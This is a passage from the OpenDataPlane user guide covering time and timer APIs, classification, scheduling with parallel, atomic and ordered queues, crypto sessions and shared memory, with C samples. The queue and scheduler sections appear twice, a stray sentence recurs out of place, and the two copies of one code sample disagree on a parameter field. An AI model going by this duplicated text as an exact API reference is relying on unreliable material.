+odp_time_diff()+, +odp_time_sum()+, +odp_time_cmp()+, and conversion
functions like +odp_time_to_ns()+, +odp_time_local_from_ns()+, and
+odp_time_global_from_ns()+. To get the resolution of the time source,
+odp_time_local_res()+ and +odp_time_global_res()+ are used. To wait,
+odp_time_wait_ns()+ and +odp_time_wait_until()+ are used, during which a
thread may busy loop for the entire wait time.

The +odp_time_t+ opaque type represents local or global timestamps.
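A common use of the time API is measuring how long a section of code takes.
A minimal sketch, assuming the work being measured is confined to one thread
so that local time suffices:

.Measuring elapsed time (sketch)
[source,c]
----
odp_time_t t1, t2;
uint64_t elapsed_ns;

t1 = odp_time_local();

/* ...work to be measured... */

t2 = odp_time_local();

/* odp_time_diff() returns t2 - t1 as an odp_time_t, which
 * odp_time_to_ns() converts to nanoseconds */
elapsed_ns = odp_time_to_ns(odp_time_diff(t2, t1));
----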
=== Timer
Timers are how ODP applications measure and respond to the passage of time.
Timers are drawn from specialized pools called timer pools that have their
own abstract type (+odp_timer_pool_t+). Applications may have many timers
active at the same time and can set them to use either relative or absolute
time. When timers expire they create events of type +odp_timeout_t+, which
serve as notifications of timer expiration.
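The following sketch shows how a timer pool might be created and a timer
allocated. The parameter field names follow the 1.x era of the API, and the
+dest_q+ handle, to which timeout events are delivered, is an assumption:

.Creating a timer pool and allocating a timer (sketch)
[source,c]
----
odp_timer_pool_param_t tparams;
odp_timer_pool_t tp;
odp_timer_t tim;

tparams.res_ns     = 1000000;    /* 1 ms timer resolution */
tparams.min_tmo    = 1000000;    /* shortest supported timeout: 1 ms */
tparams.max_tmo    = 1000000000; /* longest supported timeout: 1 s */
tparams.num_timers = 100;        /* max number of concurrently active timers */
tparams.priv       = 0;          /* pool is shared between threads */
tparams.clk_src    = ODP_CLOCK_CPU;

tp = odp_timer_pool_create("tmo_pool", &tparams);
odp_timer_pool_start();

/* Allocate a timer whose timeout events will be posted to dest_q; it
 * is subsequently armed with odp_timer_set_rel() or odp_timer_set_abs() */
tim = odp_timer_alloc(tp, dest_q, NULL);
----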
=== Synchronizer
Multiple threads operating in parallel typically require various
synchronization services to permit them to operate in a reliable and
coordinated manner. ODP provides a rich set of locks, barriers, and similar
synchronization primitives, as well as abstract types for representing various
types of atomic variables. The ODP event model also makes use of queues to
avoid the need for explicit locking in many cases. This will be discussed
in the next section.

== ODP Components
Building on ODP concepts, ODP offers several components that relate to the
flow of work through an ODP application. These include the Classifier,
Scheduler, and Traffic Manager. These components relate to the three
main stages of packet processing: Receive, Process, and Transmit.

=== Classifier
The *Classifier* provides a suite of APIs that control packet receive (RX)
processing.

.ODP Receive Processing with Classifier
image::../images/odp_rx_processing.svg[align="center"]

The classifier provides two logically related services:
[horizontal]
Packet parsing:: Verifying and extracting structural information from a
received packet.

Packet classification:: Applying *Pattern Matching Rules (PMRs)* to the
parsed results to assign an incoming packet to a *Class of Service (CoS)*.

Combined, these permit incoming packets to be sorted into *flows*, which are
logically related sequences of packets that share common processing
requirements. While many data plane applications perform stateless packet
processing (_e.g.,_ for simple forwarding) others perform stateful packet
processing. Flows anchor state information relating to these groups of
packets.

A CoS determines two attributes for packets belonging to a flow:

* The pool that they will be stored in on receipt
* The queue that they will be added to for processing

The PMRs supported by ODP permit flow determination based on combinations of
packet field values (tuples). The main advantage of classification is that on
many platforms these functions are performed in hardware, meaning that
classification occurs at line rate as packets are being received without
any explicit processing by the ODP application.

Note that the use of the classifier is optional. Applications may directly
receive packets from a corresponding PktIO input queue via direct polling
if they choose.

=== Scheduler
The *Scheduler* provides a suite of APIs that control scalable event
processing.

.ODP Scheduler and Event Processing
image::../images/odp_scheduling.svg[align="center"]

The Scheduler is responsible for selecting and dispatching one or more events
to a requesting thread. Event selection is based on several factors involving
both the queues containing schedulable events and the thread making an
+odp_schedule()+ or +odp_schedule_multi()+ call.

ODP queues have a _scheduling priority_ that determines how urgently events
on them should be processed relative to events contained in other queues.
Queues also have an associated _scheduler group id_ that must match the
scheduler group _thread mask_ of the thread calling the scheduler. This
permits events to be grouped for processing into classes and have threads
that are dedicated to processing events from specified classes. Threads can
join and leave scheduler groups dynamically, permitting easy application
response to increases in demand.

When a thread receives an event from the scheduler, it in turn can invoke
other processing engines via ODP APIs (_e.g.,_ crypto processing) that
can operate asynchronously. When such processing is complete, a
*completion event* is added to a schedulable queue, where it can be
scheduled back to a thread to continue processing with the results of the
requested asynchronous operation.

Threads themselves can enqueue events to queues for downstream processing
by other threads, permitting flexibility in how applications structure
themselves to maximize concurrency.

=== Traffic Manager
The *Traffic Manager* provides a suite of APIs that control traffic shaping and
Quality of Service (QoS) processing for packet output.

.ODP Transmit processing with Traffic Manager
image::../images/odp_traffic_manager.svg[align="center"]

The final stage of packet processing is transmission. Here, applications have
several choices. As with RX processing, applications may send packets
directly to PktIO TX queues for direct transmission. Often, however,
applications need to perform traffic shaping and related QoS processing on
the packets comprising a flow as part of transmit processing. To handle this
need, ODP provides a suite of *Traffic Manager* APIs that permit programmatic
establishment of arbiters, shapers, etc. that control output packet
processing to achieve desired QoS goals. Again, the advantage here is that on
many platforms traffic management functions are implemented in hardware,
permitting transparent offload of this work.

== ODP Application Programming
At the highest level, an *ODP Application* is a program that uses one or more
ODP APIs. Because ODP is a framework rather than a programming environment,
applications are free to also use other APIs that may or may not provide the
same portability characteristics as ODP APIs.

ODP applications vary in terms of what they do and how they operate, but in
general all share the following characteristics:

. They are organized into one or more _threads_ that execute in parallel.
. These threads communicate and coordinate their activities using various
_synchronization_ mechanisms.
. They receive packets from one or more _packet I/O interfaces_.
. They examine, transform, or otherwise process packets.
. They transmit packets to one or more _packet I/O interfaces_.

ODP provides APIs to assist in each of these areas.

=== The include structure
Applications only include the 'include/odp.h' file, which includes the
'platform/<implementation name>/include/odp' files to provide a complete
definition of the API on that platform. The doxygen documentation defining
the behavior of the ODP API is all contained in the public API files, and the
actual definitions for an implementation will be found in the per platform
directories. Per-platform data that might normally be a +#define+ can be
recovered via the appropriate access function if the #define is not directly
visible to the application.

.Users include structure
----
./
├── include/
│   ├── odp/
│   │   └── api/
│   │       └── The Public API and the documentation.
│   │
│   └── odp.h  This file should be the only file included by the application.
----

=== Initialization
IMPORTANT: ODP depends on the application to perform a graceful shutdown;
the terminate functions should be called only when the application is
sure it has closed the ingress and subsequently drained all queues, etc.

=== Startup
The first API that must be called by an ODP application is 'odp_init_global()'.
This takes two pointers. The first, +odp_init_t+, contains ODP initialization
data that is platform independent and portable, while the second,
+odp_platform_init_t+, is passed unparsed to the implementation
to be used for platform-specific data that is not yet, or may never be,
suitable for the ODP API.

Calling odp_init_global() establishes the ODP API framework and MUST be
called before any other ODP API may be called. Note that it is only called
once per application. Following global initialization, each thread in turn
calls 'odp_init_local()'. This establishes the local ODP thread
context for that thread and MUST be called before other ODP APIs may be
called by that thread.

=== Shutdown
Shutdown is the logical reverse of the initialization procedure, with
'odp_term_local()' called for each thread before 'odp_term_global()' is
called to terminate ODP.

.ODP Application Structure Flow Diagram
image::../images/resource_management.svg[align="center"]
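Putting these calls together, an application skeleton looks roughly as
follows. Exact argument lists for the initialization calls have varied
between ODP releases, so passing NULL to request implementation defaults is
an assumption here:

.ODP startup and shutdown skeleton (sketch)
[source,c]
----
int main(int argc, char *argv[])
{
	/* Global init: NULL pointers request implementation defaults for
	 * both the portable and the platform-specific parameters */
	if (odp_init_global(NULL, NULL))
		return -1;

	/* Each thread, including this initial one, establishes its own
	 * local ODP context */
	if (odp_init_local())
		return -1;

	/* ...application processing... */

	/* Shutdown proceeds in the reverse order */
	odp_term_local();
	odp_term_global();
	return 0;
}
----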
== Common Conventions
Many ODP APIs share common conventions regarding their arguments and return
types. This section highlights some of the more common and frequently used
conventions.

=== Handles and Special Designators
ODP resources are represented via _handles_ that have abstract type
_odp_resource_t_. So pools are represented by handles of type +odp_pool_t+,
queues by handles of type +odp_queue_t+, etc. Each such type
has a distinguished value _ODP_RESOURCE_INVALID_ that is used to indicate a
handle that does not refer to a valid resource of that type. Resources are
typically created via an API named _odp_resource_create()_ that returns a
handle of type _odp_resource_t_ that represents the created object. This
returned handle is set to _ODP_RESOURCE_INVALID_ if, for example, the
resource could not be created due to resource exhaustion. Invalid resources
do not necessarily represent error conditions. For example, +ODP_EVENT_INVALID+
in response to an +odp_queue_deq()+ call to get an event from a queue simply
indicates that the queue is empty.

=== Addressing Scope
Unless specifically noted in the API, all ODP resources are global to the ODP
application, whether it runs as a single process or multiple processes. ODP
handles therefore have common meaning within an ODP application but have no
meaning outside the scope of the application.

=== Resources and Names
Many ODP resource objects, such as pools and queues, support an
application-specified character string _name_ that is associated with an ODP
object at create time. This name serves two purposes: documentation and
lookup. The lookup function is particularly useful to allow an ODP application
that is divided into multiple processes to obtain the handle for a common
resource.
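For example, a process might locate a queue created elsewhere in the
application by its name. A minimal sketch; the queue name is an arbitrary
assumption:

.Looking up a queue by name (sketch)
[source,c]
----
odp_queue_t q = odp_queue_lookup("ipc_request_q");

if (q == ODP_QUEUE_INVALID) {
	/* ...no queue of that name exists... */
}
----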
== Queues
Queues are the fundamental event sequencing mechanism provided by ODP and all
ODP applications make use of them either explicitly or implicitly. Queues are
created via the 'odp_queue_create()' API that returns a handle of type
+odp_queue_t+ that is used to refer to this queue in all subsequent APIs that
reference it. Queues have one of two ODP-defined _types_, POLL and SCHED, that
determine how they are used. POLL queues are directly managed by the ODP
application while SCHED queues make use of the *ODP scheduler* to provide
automatic scalable dispatching and synchronization services.

.Operations on POLL queues
[source,c]
----
odp_queue_t poll_q1 = odp_queue_create("poll queue 1", ODP_QUEUE_TYPE_POLL, NULL);
odp_queue_t poll_q2 = odp_queue_create("poll queue 2", ODP_QUEUE_TYPE_POLL, NULL);
...
odp_event_t ev = odp_queue_deq(poll_q1);
...do something
int rc = odp_queue_enq(poll_q2, ev);
----

The key distinction is that dequeueing events from POLL queues is an
application responsibility while dequeueing events from SCHED queues is the
responsibility of the ODP scheduler.

.Operations on SCHED queues
[source,c]
----
odp_queue_param_t qp;
odp_queue_param_init(&qp);
odp_schedule_prio_t prio = ...;
odp_schedule_group_t sched_group = ...;
qp.sched.prio = prio;
qp.sched.sync = ODP_SCHED_SYNC_[NONE|ATOMIC|ORDERED];
qp.sched.group = sched_group;
qp.sched.lock_count = n; /* Only relevant for ordered queues */
odp_queue_t sched_q1 = odp_queue_create("sched queue 1", ODP_QUEUE_TYPE_SCHED, &qp);

...thread init processing

while (1) {
	odp_event_t ev;
	odp_queue_t which_q;
	ev = odp_schedule(&which_q, <wait option>);
	...process the event
}
----

With scheduled queues, events are sent to a queue, and the sender chooses
a queue based on the service it needs. The sender does not need to know
which ODP thread (on which core) or hardware accelerator will process
the event, but all the events on a queue are eventually scheduled and processed.

As can be seen, SCHED queues have additional attributes that are specified at
queue create time and that control how the scheduler is to process events
contained on them. These include group, priority, and synchronization class.

=== Scheduler Groups
The scheduler's dispatching job is to return the next event from the highest
priority SCHED queue that the caller is eligible to receive events from.
This latter consideration is determined by the queue's _scheduler group_, which
is set at queue create time, and by the caller's _scheduler group mask_ that
indicates which scheduler group(s) it belongs to. Scheduler groups are
represented by handles of type +odp_schedule_group_t+ and are created by
the *odp_schedule_group_create()* API. A number of scheduler groups are
_predefined_ by ODP. These include +ODP_SCHED_GROUP_ALL+ (all threads),
+ODP_SCHED_GROUP_WORKER+ (all worker threads), and +ODP_SCHED_GROUP_CONTROL+
(all control threads). The application is free to create additional scheduler
groups for its own purposes, and threads can join or leave scheduler groups
using the *odp_schedule_group_join()* and *odp_schedule_group_leave()* APIs.
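As a brief sketch, a group containing just the calling thread could be
created as follows; the group name is an arbitrary assumption:

.Creating a scheduler group (sketch)
[source,c]
----
odp_thrmask_t mask;
odp_schedule_group_t grp;

/* Build a thread mask containing only the calling thread */
odp_thrmask_zero(&mask);
odp_thrmask_set(&mask, odp_thread_id());

grp = odp_schedule_group_create("rx_workers", &mask);
if (grp == ODP_SCHED_GROUP_INVALID) {
	/* ...handle error... */
}
----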
=== Scheduler Priority
The +prio+ field of the +odp_queue_param_t+ specifies the queue's scheduling
priority, which is how queues within eligible scheduler groups are selected
for dispatch. Queues have a default scheduling priority of NORMAL but can be
set to HIGHEST or LOWEST according to application needs.

=== Scheduler Synchronization
In addition to its dispatching function, which provides automatic scalability
to ODP applications in many core environments, the other main function of the
scheduler is to provide event synchronization services that greatly simplify
application programming in a parallel processing environment. A queue's
SYNC mode determines how the scheduler handles the synchronization processing
of multiple events originating from the same queue.

Three types of queue scheduler synchronization are supported: Parallel,
Atomic, and Ordered.

==== Parallel Queues
SCHED queues that specify a sync mode of ODP_SCHED_SYNC_NONE are unrestricted
in how events are processed.

.Parallel Queue Scheduling
image::../images/parallel_queue.svg[align="center"]

All events held on parallel queues are eligible to be scheduled simultaneously
and any required synchronization between them is the responsibility of the
application. Events originating from parallel queues thus have the highest
throughput rate, however they also potentially involve the most work on the
part of the application. In the figure above, four threads are calling
*odp_schedule()* to obtain events to process. The scheduler has assigned
three events from the first queue to three threads in parallel. The fourth
thread is processing a single event from the third queue. The second queue
might either be empty, of lower priority, or not in a scheduler group matching
any of the threads being serviced by the scheduler.

==== Atomic Queues
Atomic queues simplify event synchronization because only a single thread may
process event(s) from a given atomic queue at a time. Events scheduled from
atomic queues thus can be processed lock free because the locking is being
done implicitly by the scheduler. Note that the caller may receive one or
more events from the same atomic queue if *odp_schedule_multi()* is used. In
this case these multiple events all share the same atomic scheduling context.

.Atomic Queue Scheduling
image::../images/atomic_queue.svg[align="center"]

In this example, no matter how many events may be held in an atomic queue,
only one calling thread can receive scheduled events from it at a time. Here
two threads process events from two different atomic queues. Note that there
is no synchronization between different atomic queues, only between events
originating from the same atomic queue. The queue context associated with the
atomic queue is held until the next call to the scheduler or until the
application explicitly releases it via a call to
*odp_schedule_release_atomic()*.

Note that while atomic queues simplify programming, the serial nature of
atomic queues may impair scaling.

==== Ordered Queues
Ordered queues provide the best of both worlds, combining the inherent
scalability of parallel queues with the easy synchronization of atomic
queues.

.Ordered Queue Scheduling
image::../images/ordered_queue.svg[align="center"]

When scheduling events from an ordered queue, the scheduler dispatches multiple
events from the queue in parallel to different threads; however, the scheduler
also ensures that the relative sequence of these events on output queues
is identical to their sequence from their originating ordered queue.

As with atomic queues, the ordering guarantees associated with ordered queues
refer to events originating from the same queue, not to those originating on
different queues. Thus in this figure three threads are processing events 5, 3,
and 4, respectively, from the first ordered queue. Regardless of how these
threads complete processing, these events will appear in their original
relative order on their output queue.

==== Order Preservation
Relative order is preserved independent of whether events are being sent to
different output queues. For example, if some events are sent to output queue
A while others are sent to output queue B, then the events on these output
queues will still be in the same relative order as they were on their
originating queue. Similarly, if the processing consumes events so that no
output is issued for some of them (_e.g.,_ as part of IP fragment reassembly
processing) then other events will still be correctly ordered with respect to
these sequence gaps. Finally, if multiple events are enqueued for a given
order (_e.g.,_ as part of packet segmentation processing for MTU
considerations), then each of these events will occupy the originator's
sequence in the target output queue(s). In this case the relative order of these
events will be in the order that the thread issued *odp_queue_enq()* calls for
them.

The ordered context associated with the dispatch of an event from an ordered
queue lasts until the next scheduler call or until explicitly released by
the thread calling *odp_schedule_release_ordered()*. This call may be used
as a performance advisory that the thread no longer requires ordering
guarantees for the current context. As a result, any subsequent enqueues
within the current scheduler context will be treated as if the thread was
operating in a parallel queue context.

==== Ordered Locking
Another powerful feature of the scheduler's handling of ordered queues is
*ordered locks*. Each ordered queue has associated with it a number of ordered
locks as specified by the _lock_count_ parameter at queue create time.

Ordered locks provide an efficient means to perform in-order sequential
processing within an ordered context. For example, suppose events with relative
order 5, 6, and 7 are being processed in parallel by three different threads.
An ordered lock will enable these threads to synchronize such that they can
perform some critical section in their originating queue order. The number of
ordered locks supported for each ordered queue is implementation dependent (and
queryable via the *odp_config_max_ordered_locks_per_queue()* API). If the
implementation supports multiple ordered locks then these may be used to
protect different ordered critical sections within a given ordered context.

==== Summary: Ordered Queues
To see how these considerations fit together, consider the following code:

.Processing with Ordered Queues
[source,c]
----
void worker_thread()
{
	odp_init_local();
	...other initialization processing

	while (1) {
		ev = odp_schedule(&which_q, ODP_SCHED_WAIT);
		...process events in parallel
		odp_schedule_order_lock(0);
		...critical section processed in order
		odp_schedule_order_unlock(0);
		...continue processing in parallel
		odp_queue_enq(dest_q, ev);
	}
}
----

This represents a simplified structure for a typical worker thread operating
on ordered queues. Multiple events are processed in parallel and the use of
ordered queues ensures that they will be placed on +dest_q+ in the same order
as they originated. While processing in parallel, the use of ordered locks
enables critical sections to be processed in order within the overall parallel
flow. When a thread arrives at the *odp_schedule_order_lock()* call, it waits
until the locking order for this lock for all prior events has been resolved
and then enters the critical section. The *odp_schedule_order_unlock()* call
releases the critical section and allows the next event in order to enter it.

=== Queue Scheduling Summary

NOTE: Both ordered and parallel queues improve throughput over atomic queues
due to parallel event processing, but require that the application take
steps to ensure context data synchronization if needed.
== Cryptographic services

ODP provides support for cryptographic operations required by various security
protocols (e.g., IPsec). To apply a cryptographic operation to a packet, a
session must first be created. Packets processed by a session share the same
cryptographic parameters, such as algorithms, keys, and initialization
vectors. A session is created with the *odp_crypto_session_create()* call.
After session creation, a cryptographic operation can be applied to a packet
using the *odp_crypto_operation()* call.
Depending on the session type (synchronous or asynchronous), the call returns
when the operation has completed, or after the request has been submitted. In
the asynchronous case an operation completion event will be enqueued on the
session completion queue. The completion event conveys the status of the
operation and the result. The application is responsible for freeing the
completion event.
The operation arguments specify, for each packet, the areas that are to be
encrypted or decrypted and authenticated. Also, in the asynchronous case a
context can be associated with a given operation, and when the operation
completion event is retrieved the associated context can be retrieved with it.
An operation can be executed in place, in which case the output packet is the
same as the input packet, or the output packet can be a new packet provided by
the application or allocated by the implementation from the session output
pool.
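To make the flow concrete, the following sketch creates a synchronous
encode (encryption) session. The parameter structure and the field and
enumeration names follow the 1.x era of the API and should be checked against
the implementation's headers; +key_data+, +compl_q+, and +out_pool+ are
assumed to exist:

.Creating a crypto session (sketch)
[source,c]
----
odp_crypto_session_params_t params;
odp_crypto_session_t session;
odp_crypto_ses_create_err_t status;

memset(&params, 0, sizeof(params));

params.op                = ODP_CRYPTO_OP_ENCODE;      /* encrypt direction */
params.cipher_alg        = ODP_CIPHER_ALG_AES128_CBC;
params.cipher_key.data   = key_data;                  /* assumed key material */
params.cipher_key.length = 16;
params.auth_alg          = ODP_AUTH_ALG_NULL;         /* no authentication */
params.pref_mode         = ODP_CRYPTO_SYNC;           /* synchronous session */
params.compl_queue       = compl_q;                   /* used in async mode */
params.output_pool       = out_pool;                  /* pool for output packets */

if (odp_crypto_session_create(&params, &session, &status)) {
	/* ...handle error, consulting status for the cause... */
}
----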
The lookup function is particularly useful to allow an ODP application\nthat is divided into multiple processes to obtain the handle for the common\nresource.\n\n== Shared memory\n=== Allocating shared memory\nBlocks of shared memory can be created using the +odp_shm_reserve()+ API\ncall. The call expects a shared memory block name, a block size, an alignment\nrequirement, and optional flags as parameters. It returns an +odp_shm_t+\nhandle. The size and alignment requirement are given in bytes.\n\n.creating a block of shared memory\n[source,c]\n----\n#define ALIGNMENT 128\n#define BLKNAME \"shared_items\"\n\nodp_shm_t shm;\nuint32_t shm_flags = 0;\n\ntypedef struct {\n...\n} shared_data_t;\n\nshm = odp_shm_reserve(BLKNAME, sizeof(shared_data_t), ALIGNMENT, shm_flags);\n----\n\n=== Getting the shared memory block address\nThe returned odp_shm_t handle can then be used to retrieve the actual\naddress (in the caller's ODP thread virtual address space) of the created\nshared memory block.\n\n.getting the address of a shared memory block\n[source,c]\n----\nshared_data_t *shared_data;\nshared_data = odp_shm_addr(shm);\n----\n\nThe address returned by +odp_shm_addr()+ is valid only in the calling ODP\nthread's address space: odp_shm_t handles can be shared between ODP threads\nand remain valid in any of them, whereas the address returned by\n+odp_shm_addr(shm)+ may differ from one ODP thread to another (for the same\n'shm' block), and should therefore not be shared between ODP threads.\nFor instance, it would be correct to send a shm handle using IPC between two\nODP threads and let each of these threads do its own +odp_shm_addr()+ to\nget the block address. Directly sending the address returned by\n+odp_shm_addr()+ from one ODP thread to another could however fail\n(the address may be meaningless in the receiver's address space).\n\nThe address returned by +odp_shm_addr()+ is nevertheless guaranteed to be\naligned according to the alignment requirements provided at block creation\ntime, even if the call to +odp_shm_addr()+ is performed by a different ODP\nthread than the one which originally called +odp_shm_reserve()+.\n\nAll shared memory blocks are contiguous in any ODP thread addressing space:\nthe range 'address' to 'address'\\+'size' (where 'size' is the shared memory\nblock size, as provided in the +odp_shm_reserve()+ call) is readable and\nwritable and maps the shared memory block.
There is no fragmentation.\n\n=== Memory behaviour\nBy default ODP threads are assumed to behave as cache coherent systems:\nany change performed on a shared memory block is guaranteed to eventually\nbecome visible to other ODP threads sharing this memory block. (This\nbehaviour may be altered by flags to +odp_shm_reserve()+ in the future.)\nNevertheless, there is no implicit memory barrier associated with any action\non shared memory: *when* a change performed by one ODP thread becomes visible\nto another ODP thread is not defined, so an application using shared memory\nblocks has to use the memory barriers provided by ODP to guarantee shared data\nvalidity between ODP threads.\n\n=== Lookup by name\nAs mentioned, shared memory handles can be sent from one ODP thread to\nanother using any IPC mechanism, and then the block address retrieved.\nA simpler approach to get the shared memory block handle of an already created\nblock is to use the +odp_shm_lookup()+ API function call.\nThis nevertheless requires the calling ODP thread to provide the name of the\nshared memory block:\n+odp_shm_lookup()+ will return +ODP_SHM_INVALID+ if no shared memory block\nwith the provided name is known by ODP.\n\n.retrieving a block handle and address from another ODP thread\n[source,c]\n----\n#define BLKNAME \"shared_items\"\n\nodp_shm_t shm;\nshared_data_t *shared_data;\n\nshm = odp_shm_lookup(BLKNAME);\nif (shm != ODP_SHM_INVALID) {\n\tshared_data = odp_shm_addr(shm);\n\t...\n}\n----\n\n=== Freeing memory\nFreeing shared memory is performed using the +odp_shm_free()+ API call.\n+odp_shm_free()+ takes a single argument, the shared memory block handle.\nAny ODP thread is allowed to perform an +odp_shm_free()+ on a shared memory\nblock (i.e. the thread performing the +odp_shm_free()+ may be different\nfrom the thread which did the +odp_shm_reserve()+). Shared memory blocks should\nbe freed only once, and once freed, a shared memory block should no longer\nbe referenced by any ODP threads.\n\n.freeing a shared memory block\n[source,c]\n----\nif (odp_shm_free(shm) != 0) {\n\t...\/\/handle error\n}\n----\n\n=== Memory creation flags\nThe last argument to odp_shm_reserve() is a set of ORed flags.\nTwo flags are supported:\n\n==== ODP_SHM_PROC\nWhen this flag is given, the allocated shared memory will become visible\noutside ODP. Non-ODP threads (e.g. ordinary Linux processes or threads)\nwill be able to access the memory using native (non-ODP) OS calls such as\n'shm_open()' and 'mmap()' (on Linux).\nEach ODP implementation should provide a description of exactly how\nthis mapping is done on that specific platform.\n\n==== ODP_SHM_SW_ONLY\nThis flag tells ODP that the shared memory will be used by the ODP application\nsoftware only: no HW (such as DMA engines or other accelerators) will ever\ntry to access the memory. No other ODP call will be involved with this memory\n(as ODP calls could implicitly involve HW, depending on the ODP\nimplementation), except for +odp_shm_lookup()+ and +odp_shm_free()+.\nODP implementations may use this flag as a hint for performance optimization,\nor may simply ignore it.\n\n== Queues\nQueues are the fundamental event sequencing mechanism provided by ODP and all\nODP applications make use of them either explicitly or implicitly. Queues are\ncreated via the 'odp_queue_create()' API that returns a handle of type\n+odp_queue_t+ that is used to refer to this queue in all subsequent APIs that\nreference it.
Queues have one of two ODP-defined _types_, POLL and SCHED, that\ndetermine how they are used. POLL queues are directly managed by the ODP\napplication while SCHED queues make use of the *ODP scheduler* to provide\nautomatic scalable dispatching and synchronization services.\n\n.Operations on POLL queues\n[source,c]\n----\nodp_queue_t poll_q1 = odp_queue_create(\"poll queue 1\", ODP_QUEUE_TYPE_POLL, NULL);\nodp_queue_t poll_q2 = odp_queue_create(\"poll queue 2\", ODP_QUEUE_TYPE_POLL, NULL);\n...\nodp_event_t ev = odp_queue_deq(poll_q1);\n...do something\nint rc = odp_queue_enq(poll_q2, ev);\n----\n\nThe key distinction is that dequeueing events from POLL queues is an\napplication responsibility while dequeueing events from SCHED queues is the\nresponsibility of the ODP scheduler.\n\n.Operations on SCHED queues\n[source,c]\n----\nodp_queue_param_t qp;\nodp_queue_param_init(&qp);\nodp_schedule_prio_t prio = ...;\nodp_schedule_group_t sched_group = ...;\nqp.sched.prio = prio;\nqp.sched.sync = ODP_SCHED_SYNC_[NONE|ATOMIC|ORDERED];\nqp.sched.group = sched_group;\nqp.lock_count = n; \/* Only relevant for ordered queues *\/\nodp_queue_t sched_q1 = odp_queue_create(\"sched queue 1\", ODP_QUEUE_TYPE_SCHED, &qp);\n\n...thread init processing\n\nwhile (1) {\n odp_event_t ev;\n odp_queue_t which_q;\n ev = odp_schedule(&which_q, <wait option>);\n ...process the event\n}\n----\n\nWith scheduled queues, events are sent to a queue, and the sender chooses\na queue based on the service it needs. The sender does not need to know\nwhich ODP thread (on which core) or hardware accelerator will process\nthe event, but all the events on a queue are eventually scheduled and processed.\n\nAs can be seen, SCHED queues have additional attributes that are specified at\nqueue create time that control how the scheduler is to process events contained\non them. These include group, priority, and synchronization class.\n\n=== Scheduler Groups\nThe scheduler's dispatching job is to return the next event from the highest\npriority SCHED queue that the caller is eligible to receive events from.\nThis latter consideration is determined by the queue's _scheduler group_, which\nis set at queue create time, and by the caller's _scheduler group mask_ that\nindicates which scheduler group(s) it belongs to. Scheduler groups are\nrepresented by handles of type +odp_schedule_group_t+ and are created by\nthe *odp_schedule_group_create()* API. A number of scheduler groups are\n_predefined_ by ODP. These include +ODP_SCHED_GROUP_ALL+ (all threads),\n+ODP_SCHED_GROUP_WORKER+ (all worker threads), and +ODP_SCHED_GROUP_CONTROL+\n(all control threads). The application is free to create additional scheduler\ngroups for its own purposes, and threads can join or leave scheduler groups\nusing the *odp_schedule_group_join()* and *odp_schedule_group_leave()* APIs.\n\n=== Scheduler Priority\nThe +prio+ field of the +odp_queue_param_t+ specifies the queue's scheduling\npriority, which is how queues within eligible scheduler groups are selected\nfor dispatch. Queues have a default scheduling priority of NORMAL but can be\nset to HIGHEST or LOWEST according to application needs.\n\n=== Scheduler Synchronization\nIn addition to its dispatching function, which provides automatic scalability\nto ODP applications in many core environments, the other main function of the\nscheduler is to provide event synchronization services that greatly simplify\napplication programming in a parallel processing environment.
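\n\nBefore looking at synchronization in detail, the following sketch illustrates the scheduler group APIs introduced above: it creates an (initially empty) group and has the calling thread add itself to it. The group name \"rx workers\" is an arbitrary choice for illustration, and error handling is elided:\n\n.Creating and joining a scheduler group (sketch)\n[source,c]\n----\nodp_thrmask_t zero, self;\n\nodp_thrmask_zero(&zero);\n\n\/* Create a scheduler group with no member threads yet *\/\nodp_schedule_group_t grp = odp_schedule_group_create(\"rx workers\", &zero);\n\n\/* Each participating thread then adds itself to the group *\/\nodp_thrmask_zero(&self);\nodp_thrmask_set(&self, odp_thread_id());\nodp_schedule_group_join(grp, &self);\n\n\/* Queues created with qp.sched.group = grp will only be dispatched\n * to threads that have joined the group *\/\n----\n\n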
A queue's\nSYNC mode determines how the scheduler handles the synchronization processing\nof multiple events originating from the same queue.\n\nThree types of queue scheduler synchronization are supported: Parallel,\nAtomic, and Ordered.\n\n==== Parallel Queues\nSCHED queues that specify a sync mode of ODP_SCHED_SYNC_NONE are unrestricted\nin how events are processed.\n\n.Parallel Queue Scheduling\nimage::parallel_queue.svg[align=\"center\"]\n\nAll events held on parallel queues are eligible to be scheduled simultaneously\nand any required synchronization between them is the responsibility of the\napplication. Events originating from parallel queues thus have the highest\nthroughput rate; however, they also potentially involve the most work on the\npart of the application. In the Figure above, four threads are calling\n*odp_schedule()* to obtain events to process. The scheduler has assigned\nthree events from the first queue to three threads in parallel. The fourth\nthread is processing a single event from the third queue. The second queue\nmight either be empty, of lower priority, or not in a scheduler group matching\nany of the threads being serviced by the scheduler.\n\n==== Atomic Queues\nAtomic queues simplify event synchronization because only a single thread may\nprocess event(s) from a given atomic queue at a time. Events scheduled from\natomic queues thus can be processed lock free because the locking is done\nimplicitly by the scheduler. Note that the caller may receive one or\nmore events from the same atomic queue if *odp_schedule_multi()* is used. In\nthis case these multiple events all share the same atomic scheduling context.\n\n.Atomic Queue Scheduling\nimage::atomic_queue.svg[align=\"center\"]\n\nIn this example, no matter how many events may be held in an atomic queue,\nonly one calling thread can receive scheduled events from it at a time. Here\ntwo threads process events from two different atomic queues. Note that there\nis no synchronization between different atomic queues, only between events\noriginating from the same atomic queue. The queue context associated with the\natomic queue is held until the next call to the scheduler or until the\napplication explicitly releases it via a call to\n*odp_schedule_release_atomic()*.\n\nNote that while atomic queues simplify programming, the serial nature of\natomic queues may impair scaling.\n\n==== Ordered Queues\nOrdered queues provide the best of both worlds by combining the inherent\nscalability of parallel queues with the easy synchronization of atomic\nqueues.\n\n.Ordered Queue Scheduling\nimage::ordered_queue.svg[align=\"center\"]\n\nWhen scheduling events from an ordered queue, the scheduler dispatches multiple\nevents from the queue in parallel to different threads; however, the scheduler\nalso ensures that the relative sequence of these events on output queues\nis identical to their sequence from their originating ordered queue.\n\nAs with atomic queues, the ordering guarantees associated with ordered queues\nrefer to events originating from the same queue, not to those originating on\ndifferent queues. Thus in this figure three threads are processing events 5, 3,\nand 4, respectively, from the first ordered queue. Regardless of how these\nthreads complete processing, these events will appear in their original\nrelative order on their output queue.\n\n==== Order Preservation\nRelative order is preserved independent of whether events are being sent to\ndifferent output queues.
